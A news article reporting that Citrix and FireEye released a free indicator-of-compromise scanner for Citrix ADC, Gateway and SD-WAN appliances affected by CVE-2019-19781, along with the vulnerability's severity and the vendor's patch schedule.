Citrix and FireEye release free scanner to detect breached Citrix appliances

The Citrix/FireEye tool can identify systems compromised by CVE 2019-19781 exploits

Citrix, in collaboration with FireEye, has released a free tool that Citrix customers can use to assess their risk of compromise from the recently publicised critical security flaws.

This Indicator of Compromise (IoC) scanner is available free of charge under the Apache 2.0 open source licence, according to Citrix, and will help customers identify Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances already compromised under the CVE-2019-19781 security vulnerability.

The company said that Citrix customers should use the tool to scan their Citrix instances locally, one appliance at a time. The tool will examine available log sources and other forensic artefacts to provide an assessment of potential compromise detected on the system.

The tool is freely available in both the Citrix and FireEye GitHub repositories.

"Citrix is deeply committed to the security of our products and services, and we are making every effort to ensure all customers are supported in response to CVE-2019-19781," said Citrix CISO Fermin J. Serna.

He recommended all Citrix customers run the tool as soon as possible.

We are committed to the security of our products & we are making every effort to ensure all customers are supported in response to #CVE2019-19781. To that end, we have teamed up with @FireEye on a scanner that aids customers in the detection of compromise.https://t.co/Nk8xO95fVv

— Citrix (@citrix) January 22, 2020

The new tool is compatible with the following products:

It is capable of identifying file system paths of various known malware; analysing webserver log entries to indicate successful exploitation; reviewing post-exploitation activity in shell history; and detecting unexpected changes in NetScaler directories, unexpected processes, and ports used by known malware.

Serna said that their security team is currently scanning the internet to identify customers vulnerable to the security flaw, but have not yet applied recommended mitigations or installed the patches that Citrix has so far issued.

The company is contacting those customers individually and encouraging them to apply the mitigations right away.

On 19th January, Citrix finally released the first patches for the CVE-2019-19781 security vulnerability. However, the permanent fixes were only released for ADC versions 11.1 and 12.0 only. The company also announced that permanent patches for other versions would be released on 24th January.

According to security specialists, CVE-2019-19781 represents a serious threat. If exploited, it could enable an unauthenticated attacker to remotely access private network resources and execute arbitrary code.

The vulnerability affects Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

The bug was uncovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, in December, and was reported to Citrix in the same month.

At the time, Citrix released a set of risk mitigation measures for its customers, and promised to release permanent fixes before the end of January.

Earlier this month, researchers warned that they had spotted a number of threat actors scanning the internet in search of Citrix servers vulnerable to the flaw.